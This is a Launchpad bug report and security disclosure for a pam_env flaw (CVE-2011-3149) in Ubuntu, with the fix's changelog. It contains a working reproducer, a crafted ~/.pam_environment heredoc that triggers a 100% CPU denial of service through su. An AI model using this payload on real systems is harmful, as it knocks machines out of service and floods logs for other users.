100% CPU utilitization in pam_env parsing

Bug #874565 reported by Kees Cook
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
pam (Ubuntu)
Fix Released
Undecided
Unassigned

Bug Description

The pam_env variable expansion routine does not correctly abort under some situations when expending variable names. This triggers 100% CPU use and syslog flooding.

To reproduce:

cat <<EOM >~/.pam_environment

EVIL_FILLER_255 DEFAULT=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM

This will trigger CPU usage for whatever process runs the PAM stack. For example, to make root run away, run "su - $USER" and correctly authenticate.

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Please use CVE-2011-3149

Revision history for this message
Kees Cook (kees) wrote :

I've reported this privately to upstream; waiting for a reply.

Changed in pam (Ubuntu):
status: New → Triaged
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package pam - 1.1.3-2ubuntu2.1

---------------
pam (1.1.3-2ubuntu2.1) oneiric-security; urgency=low

  * SECURITY UPDATE: possible code execution via incorrect environment file
    parsing (LP: #874469)
    - debian/patches-applied/CVE-2011-3148.patch: correctly count leading
      whitespace when parsing environment file in modules/pam_env/pam_env.c.
    - CVE-2011-3148
  * SECURITY UPDATE: denial of service via overflowed environment variable
    expansion (LP: #874565)
    - debian/patches-applied/CVE-2011-3149.patch: when overflowing, exit
      with PAM_BUF_ERR in modules/pam_env/pam_env.c.
    - CVE-2011-3149
  * SECURITY UPDATE: code execution via incorrect environment cleaning
    - debian/patches-applied/update-motd: updated to use clean environment
      and absolute paths in modules/pam_motd/pam_motd.c.
    - CVE-2011-XXXX
 -- Marc Deslauriers <email address hidden> Tue, 18 Oct 2011 09:33:47 -0400

Changed in pam (Ubuntu):
status: Triaged → Fix Released
visibility: private → public
visibility: private → public
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.